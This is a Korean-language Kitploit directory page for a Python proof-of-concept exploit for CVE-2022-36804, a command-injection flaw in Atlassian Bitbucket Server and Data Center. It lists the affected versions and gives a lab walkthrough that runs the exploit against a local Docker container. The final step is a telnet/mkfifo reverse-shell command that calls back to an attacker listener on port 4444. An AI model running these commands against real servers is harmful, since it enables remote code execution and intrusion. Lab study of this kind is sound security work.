Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-36804 — Python 기반의 개념 증명 익스플로잇으로, Atlassian Bitbucket Server 및 Data Center의 명령 삽입 취약점(CVE-2022-36804)을 통해 악의적인 HTTP 요청으로 원격 코드 실행을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/asepsaepdin/cve-2022-36804
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHubasepsaepdin/cve-2022-36804

CVE-2022-36804

Python 기반의 개념 증명 익스플로잇으로, Atlassian Bitbucket Server 및 Data Center의 명령 삽입 취약점(CVE-2022-36804)을 통해 악의적인 HTTP 요청으로 원격 코드 실행을 가능하게 합니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-36804 - Atlassian Bitbucket Server 및 Data Center 명령 삽입 취약점

Python


⚠️ 교육 및 승인된 보안 연구 목적으로만 사용하세요

원본 익스플로잇 저자

원본 PoC 작성자 Walnut Security Services Pvt. Ltd님께 깊은 감사를 드립니다.

설명

Atlassian Bitbucket Server 및 Data Center 7.0.0에서 7.6.17 미만, 7.7.0에서 7.17.10 미만, 7.18.0에서 7.21.4 미만, 8.0.0에서 8.0.3 미만, 8.1.0에서 8.1.3 미만, 8.2.0에서 8.2.2 미만, 8.3.0에서 8.3.1 미만 버전의 여러 API 엔드포인트는 공개 또는 비공개 Bitbucket 저장소에 읽기 권한이 있는 원격 공격자가 악의적인 HTTP 요청을 전송하여 임의 코드를 실행할 수 있도록 허용합니다. 이 취약점은 TheGrandPew님이 당사의 버그 바운티 프로그램을 통해 보고했습니다.


단계별 가이드

  1. 먼저, 저장소를 클론합니다.

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    
  2. 디렉토리 변경

    root@kitploit:~
    cd CVE-2022-36804
    
  3. 취약한 컨테이너 빌드

    root@kitploit:~
    docker build -t CVE-2022-36804 .
    
  4. 임시 컨테이너 실행

    root@kitploit:~
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    
  5. 컨테이너 IP 주소 확인

    root@kitploit:~
    docker inspect CVE-2022-36804 | grep "IPAddress"
    
  6. Atlassian Bitbucket을 설정하고 다음 URL을 열어 새 공개 저장소 생성: http://172.17.0.3:7990

  7. 원격 코드 실행(RCE) 확인

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    
  8. 사용자 정의 명령어(cmd)로 RCE 확인

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    
  9. 공격자 관점에서 원격 코드 실행은 대화형 셸에 접근하는 데 중요합니다. 따라서 다음 명령어를 실행하면 공격자 시스템의 4444/tcp 포트로 텔넷 리버스 셸이 bash 기반 TCP로 트리거됩니다:

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
    
    root@kitploit:~
    nc -nlvp 4444
    

크레딧

  • https://github.com/walnutsecurity/cve-2022-36804
  • https://nvd.nist.gov/vuln/detail/cve-2022-36804
도구 다운로드